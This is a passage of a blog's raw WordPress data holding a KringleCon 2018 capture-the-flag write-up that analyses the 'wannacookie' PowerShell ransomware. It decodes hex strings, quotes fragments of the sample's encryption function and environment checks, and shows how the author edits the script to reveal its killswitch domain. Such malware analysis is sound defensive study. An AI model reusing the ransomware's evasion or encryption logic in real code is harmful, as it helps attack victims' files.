srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture11-3.png?w=994&amp;ssl=1 994w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture11-3.png?resize=300%2C60&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture11-3.png?resize=768%2C153&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture11-3.png?resize=700%2C139&amp;ssl=1 700w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">So we have the file!<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"750\" height=\"151\" data-attachment-id=\"407\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-3-stop-the-malware\/capture12-4\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture12-3.png?fit=750%2C151&amp;ssl=1\" data-orig-size=\"750,151\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Capture12\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture12-3.png?fit=700%2C141&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture12-3.png?fit=700%2C141&amp;ssl=1\" alt=\"\" class=\"wp-image-407\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture12-3.png?w=750&amp;ssl=1 750w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture12-3.png?resize=300%2C60&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture12-3.png?resize=700%2C141&amp;ssl=1 700w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">We can already see that the newer file &#8220;<a href=\"https:\/\/pastebin.com\/raw\/VGicip20\">test1.txt<\/a>&#8221; is much better.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"1905\" height=\"208\" data-attachment-id=\"408\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-3-stop-the-malware\/capture13-4\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture13-3.png?fit=1905%2C208&amp;ssl=1\" data-orig-size=\"1905,208\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Capture13\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture13-3.png?fit=700%2C76&amp;ssl=1\" src=\"https:\/\/i1.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture13-3.png?fit=700%2C76&amp;ssl=1\" alt=\"\" class=\"wp-image-408\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture13-3.png?w=1905&amp;ssl=1 1905w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture13-3.png?resize=300%2C33&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture13-3.png?resize=768%2C84&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture13-3.png?resize=700%2C76&amp;ssl=1 700w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture13-3.png?w=1400&amp;ssl=1 1400w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">Now we need to find the domain name that the malware is calling too. So that&#8217;s it!<\/p>\n\n\n\n<p style=\"text-align:center\">As we go further into the wannacookie PowerShell script, we can find many different Hex codes, using the same website as before this is what they mean.<br>\n&#8220;6B6579666F72626F746964&#8221; = Keyforbotid.<br>\n&#8220;6B696C6C737769746368&#8221; = Killswitch.<br>\n&#8220;7365727665722E637274&#8221; = Server.crt.<br>\n&#8220;72616e736f6d697370616964&#8221; = Ransomispaid.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"813\" height=\"345\" data-attachment-id=\"410\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-3-stop-the-malware\/capture14-4\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture14-3.png?fit=813%2C345&amp;ssl=1\" data-orig-size=\"813,345\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Capture14\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture14-3.png?fit=700%2C297&amp;ssl=1\" src=\"https:\/\/i1.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture14-3.png?fit=700%2C297&amp;ssl=1\" alt=\"\" class=\"wp-image-410\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture14-3.png?w=813&amp;ssl=1 813w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture14-3.png?resize=300%2C127&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture14-3.png?resize=768%2C326&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture14-3.png?resize=700%2C297&amp;ssl=1 700w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">Killswitch &#8220;6B696C6C737769746368&#8221; Is the one we are looking at here, even do we have the script we need\u2026 We still don&#8217;t have the domain, so let&#8217;s run the script, however, let&#8217; edit it first to make it print out the domain name. <\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"418\" height=\"499\" data-attachment-id=\"409\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-3-stop-the-malware\/capture15-4\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture15-3.png?fit=418%2C499&amp;ssl=1\" data-orig-size=\"418,499\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Capture15\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture15-3.png?fit=418%2C499&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture15-3.png?resize=418%2C499&#038;ssl=1\" alt=\"\" class=\"wp-image-409\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture15-3.png?w=418&amp;ssl=1 418w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture15-3.png?resize=251%2C300&amp;ssl=1 251w\" sizes=\"auto, (max-width: 418px) 100vw, 418px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">First let&#8217;s remove &#8220;function Enc_Dec-File($key, $File, $enc_it)&#8221; (As this is the part that will encrypt all the files\u2026 Which is not something we need! And &#8220;function enc_dec&#8221;  and &#8220;-Server 8.8.8.8))) {return} if ($(netstat -ano | Select-String &#8220;127.0.0.1:8080&#8221;).length -ne 0 -or (Get-WmiObject Win32_ComputerSystem).Domain -ne &#8220;KRINGLECASTLE&#8221;) {return}&#8221; (Plus everything till the end)<br>\nSince we don&#8217;t need the script calling back, we want to print out the output!<\/p>\n\n\n\n<p style=\"text-align:center\">Next change &#8220;if ($null -ne ((Resolve-DnsName -Name&#8221; to &#8220;write-host&#8221; and  delete this string &#8221; .ToString() -ErrorAction 0&#8243; Again we want the script to output the domain, not to call back or encrypt our files!<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"810\" height=\"103\" data-attachment-id=\"411\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-3-stop-the-malware\/capture16-3\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture16-2.png?fit=810%2C103&amp;ssl=1\" data-orig-size=\"810,103\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Capture16\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture16-2.png?fit=700%2C89&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture16-2.png?fit=700%2C89&amp;ssl=1\" alt=\"\" class=\"wp-image-411\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture16-2.png?w=810&amp;ssl=1 810w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture16-2.png?resize=300%2C38&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture16-2.png?resize=768%2C98&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture16-2.png?resize=700%2C89&amp;ssl=1 700w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">(You can view the script <a href=\"https:\/\/pastebin.com\/raw\/VGicip20\">here<\/a>)<\/p>\n\n\n\n<p style=\"text-align:center\">Now we can run the script in windows and not worry about any issues (I still recommend it&#8217;s best to run in a VM!) <\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"907\" height=\"425\" data-attachment-id=\"412\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-3-stop-the-malware\/capture17-3\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture17-2.png?fit=907%2C425&amp;ssl=1\" data-orig-size=\"907,425\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Capture17\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture17-2.png?fit=700%2C328&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture17-2.png?fit=700%2C328&amp;ssl=1\" alt=\"\" class=\"wp-image-412\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture17-2.png?w=907&amp;ssl=1 907w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture17-2.png?resize=300%2C141&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture17-2.png?resize=768%2C360&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture17-2.png?resize=700%2C328&amp;ssl=1 700w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">So the domain we need is &#8220;yippeekiyaa.aaay&#8221;<br>\n(Note: If you&#8217;re having any issues with the PowerShell scripts, using Windows 10 fixes most\/all the issues you may face.)<\/p>\n\n\n\n<p style=\"text-align:center\">Moreover, that&#8217;s another one done!<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"652\" height=\"489\" data-attachment-id=\"413\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-3-stop-the-malware\/capture18-3\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture18-2.png?fit=652%2C489&amp;ssl=1\" data-orig-size=\"652,489\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Capture18\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture18-2.png?fit=652%2C489&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture18-2.png?resize=652%2C489&#038;ssl=1\" alt=\"\" class=\"wp-image-413\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture18-2.png?w=652&amp;ssl=1 652w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture18-2.png?resize=300%2C225&amp;ssl=1 300w\" sizes=\"auto, (max-width: 652px) 100vw, 652px\" \/><\/figure><\/div>\n","protected":false},"excerpt":{"rendered":"<p>In this objective, we need to stop the malware! Once again we are given the same hint from Shinny Upatree. &#8220;Sweet candy goodness &#8211; I win! Thank you so much! Have you heard that Kringle&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[10],"tags":[13,14,12],"class_list":["post-395","post","type-post","status-publish","format-standard","hentry","category-kringlecon-2018","tag-13","tag-ctf","tag-kringlecon"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/paD3U6-6n","_links":{"self":[{"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/posts\/395","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/comments?post=395"}],"version-history":[{"count":1,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/posts\/395\/revisions"}],"predecessor-version":[{"id":414,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/posts\/395\/revisions\/414"}],"wp:attachment":[{"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/media?parent=395"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/categories?post=395"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/tags?post=395"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}